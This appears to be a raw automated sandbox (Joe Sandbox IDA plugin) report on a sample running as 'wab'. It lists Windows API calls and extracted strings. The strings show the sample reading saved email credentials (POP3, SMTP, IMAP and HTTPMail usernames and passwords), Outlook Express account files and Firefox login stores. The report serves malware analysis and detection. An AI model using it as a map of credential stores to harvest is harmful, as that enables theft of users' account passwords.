                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  Strings
                                                  Similarity
                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                  • API String ID: 3963849919-1658304561
                                                  APIs
                                                  • memset.MSVCRT ref: 004024F5
                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                  • _mbscpy.MSVCRT ref: 00402533
                                                  • _mbscpy.MSVCRT ref: 004025FD
                                                  Strings
                                                  Similarity
                                                  • API ID: _mbscpy$QueryValuememset
                                                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                  • API String ID: 168965057-606283353
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                  • memset.MSVCRT ref: 0040128E
                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscat$memsetsprintf$_mbscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: sprintf$memset$_mbscpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  APIs
                                                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                    • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                    • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                  • strlen.MSVCRT ref: 0040F139
                                                  • strlen.MSVCRT ref: 0040F147
                                                  • memset.MSVCRT ref: 0040F187
                                                  • strlen.MSVCRT ref: 0040F196
                                                  • strlen.MSVCRT ref: 0040F1A4
                                                  • memset.MSVCRT ref: 0040F1EA
                                                  • strlen.MSVCRT ref: 0040F1F9
                                                  • strlen.MSVCRT ref: 0040F207
                                                  • _strcmpi.MSVCRT ref: 0040F2B2
                                                  • _mbscpy.MSVCRT ref: 0040F2CD
                                                  • _mbscpy.MSVCRT ref: 0040F30E
                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                  APIs
                                                  • wcsstr.MSVCRT ref: 0040426A
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                  • _mbscpy.MSVCRT ref: 004042D5
                                                  • _mbscpy.MSVCRT ref: 004042E8
                                                  • strchr.MSVCRT ref: 004042F6
                                                  • strlen.MSVCRT ref: 0040430A
                                                  • sprintf.MSVCRT ref: 0040432B
                                                  • strchr.MSVCRT ref: 0040433C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                  • String ID: %s@gmail.com$www.google.com
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                  APIs
                                                  • strchr.MSVCRT ref: 004100E4
                                                  • _mbscpy.MSVCRT ref: 004100F2
                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                  • _mbscpy.MSVCRT ref: 00410142
                                                  • _mbscat.MSVCRT ref: 0041014D
                                                  • memset.MSVCRT ref: 00410129
                                                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                    • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                  • memset.MSVCRT ref: 00410171
                                                  • memcpy.MSVCRT ref: 0041018C
                                                  • _mbscat.MSVCRT ref: 00410197
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                  • String ID: \systemroot
                                                  APIs
                                                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                  • strchr.MSVCRT ref: 0040327B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringstrchr
                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  APIs
                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                  • GetSysColor.USER32(0000000F), ref: 0040B472
                                                  • DeleteObject.GDI32(?), ref: 0040B4A6
                                                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DeleteImageLoadObject$Color
                                                  • String ID:
                                                  APIs
                                                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                  • GetDC.USER32(00000000), ref: 004072FB
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                  APIs
                                                  • memset.MSVCRT ref: 0040810E
                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7610E430,?), ref: 004081B9
                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                  • API String ID: 524865279-2190619648
                                                  • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                  • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                  • String ID: 0$6
                                                  • API String ID: 2300387033-3849865405
                                                  • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                  • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscat$memsetsprintf
                                                  • String ID: %2.2X
                                                  • API String ID: 125969286-791839006
                                                  • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                  • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                  APIs
                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                    • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                  • CloseHandle.KERNEL32(?), ref: 00444206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                  • String ID: ACD
                                                  • API String ID: 1886237854-620537770
                                                  • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                  • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                  APIs
                                                  • memset.MSVCRT ref: 004091EC
                                                  • sprintf.MSVCRT ref: 00409201
                                                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                    • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                  • SetWindowTextA.USER32(?,?), ref: 00409228
                                                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                  • String ID: caption$dialog_%d
                                                  • API String ID: 2923679083-4161923789
                                                  • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                  • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                  • memset.MSVCRT ref: 00410246
                                                  • memset.MSVCRT ref: 00410258
                                                    • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                  • memset.MSVCRT ref: 0041033F
                                                  • _mbscpy.MSVCRT ref: 00410364
                                                  • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 3974772901-0
                                                  • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                  • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                  APIs
                                                  • wcslen.MSVCRT ref: 0044406C
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                  • strlen.MSVCRT ref: 004440D1
                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                  • memcpy.MSVCRT ref: 004440EB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                  • String ID:
                                                  • API String ID: 577244452-0
                                                  • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                  • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C02D
                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                    • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 2726666094-3614832568
                                                  • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                  • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                  • OpenClipboard.USER32(?), ref: 0040C1B1
                                                  • GetLastError.KERNEL32 ref: 0040C1CA
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                  • String ID:
                                                  • API String ID: 2014771361-0
                                                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                  APIs
                                                  • memcmp.MSVCRT ref: 00406151
                                                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                  • memcmp.MSVCRT ref: 0040617C
                                                  • memcmp.MSVCRT ref: 004061A4
                                                  • memcpy.MSVCRT ref: 004061C1
                                                  Strings
                                                  Memory Dump Source
